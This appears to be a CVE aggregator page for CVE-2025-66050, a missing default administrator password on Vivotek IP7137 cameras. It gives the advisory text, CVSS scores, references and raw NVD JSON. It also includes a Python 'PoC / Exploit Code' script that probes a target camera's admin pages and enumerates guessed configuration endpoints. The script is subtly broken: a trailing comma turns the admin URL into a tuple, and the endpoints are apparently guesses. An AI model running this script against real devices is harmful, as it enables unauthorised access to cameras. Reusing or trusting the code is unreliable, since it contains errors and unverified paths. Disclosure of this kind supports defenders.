CVE-2025-66050

Description

Vivotek IP7137 camera with firmware version 0200a by default dos not require to provide any password when logging in as an administrator. While it is possible to set up such a password, a user is not informed about such a need. The vendor has not replied to the CNA. Possibly all firmware versions are affected. Since the product has met End-Of-Life phase, a fix is not expected to be released.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:vivotek:ip7137_firmware:0200a:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:vivotek:ip7137:-:*:*:*:*:*:*:* - NOT VULNERABLE

Vivotek IP7137 Firmware 0200a（已确认受影响）

Vivotek IP7137 所有固件版本（可能受影响）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2025-66050 PoC - Vivotek IP7137 Default Admin No Password
# Target: Vivotek IP7137 IP Camera
# Vulnerability: Default administrator account with no password

target_ip = "192.168.1.100"  # Replace with target camera IP
target_port = 80

def check_vivotek_vulnerability():
    """
    Check if Vivotek IP7137 camera is vulnerable to CVE-2025-66050
    """
    # Try to access the admin login page without credentials
    login_url = f"http://{target_ip}:{target_port}/login.cgi"
    
    try:
        # Request without any authentication
        response = requests.get(login_url, timeout=10)
        
        if response.status_code == 200:
            # Check if we can access admin features
            admin_url = f"http://{target_ip}:{target_port}/admin/",
            admin_response = requests.get(admin_url, timeout=10)
            
            if admin_response.status_code == 200:
                print("[+] VULNERABLE: Device allows admin access without password")
                print("[+] CVE-2025-66050 confirmed")
                return True
        
        print("[-] Device may not be vulnerable or is not Vivotek IP7137")
        return False
    
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

def exploit_default_admin():
    """
    Exploit CVE-2025-66050 to gain admin access
    """
    base_url = f"http://{target_ip}:{target_port}"
    
    # Access admin configuration page
    config_endpoints = [
        "/admin/systeminfo",
        "/admin/network",
        "/admin/users",
        "/admin/config",
        "/cgi-bin/admin/getparam",
    ]
    
    for endpoint in config_endpoints:
        try:
            response = requests.get(base_url + endpoint, timeout=10)
            if response.status_code == 200:
                print(f"[+] Accessible endpoint: {endpoint}")
                print(f"[+] Response preview: {response.text[:200]}...")
        except:
            pass

if __name__ == "__main__":
    print("CVE-2025-66050 Vivotek IP7137 No-Password Admin Exploit")
    check_vivotek_vulnerability()
    # Uncomment to exploit:
    # exploit_default_admin()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66050
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66050
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66050/
[4] VulDB https://vuldb.com/cve/CVE-2025-66050
[5] https://cert.pl/posts/2026/01/CVE-2025-66049

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66050", "sourceIdentifier": "[email protected]", "published": "2026-01-09T12:15:53.587", "lastModified": "2026-01-14T17:48:29.730", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "Vivotek IP7137 camera with firmware version 0200a by default dos not require to provide any password when logging in as an administrator. While it is possible to set up such a password, a user is not informed about such a need.\nThe vendor has not replied to the CNA. Possibly all firmware versions are affected. Since the product has met End-Of-Life phase, a fix is not expected to be released."}, {"lang": "es", "value": "La cámara Vivotek IP7137 con la versión de firmware 0200a por defecto no requiere proporcionar ninguna contraseña al iniciar sesión como administrador. Si bien es posible configurar dicha contraseña, un usuario no es informado sobre dicha necesidad. El proveedor no ha respondido a la CNA. Posiblemente todas las versiones de firmware están afectadas. Dado que el producto ha alcanzado la fase de Fin de Vida Útil, no se espera que se lance una solución."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1393"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:vivotek:ip7137_firmware:0200a:*:*:*:*:*:*:*", "matchCriteriaId": "7FBD8C69-D2F8-46B0-AE09-F6296BD22414"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:vivotek:ip7137:-:*:*:*:*:*:*:*", "matchCriteriaId": "2BE1F29C-4CF4-46B7-862B-C4B3F00B70EE"}]}]}], "references": [{"url": "https://cert.pl/posts/2026/01/CVE-2025-66049", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}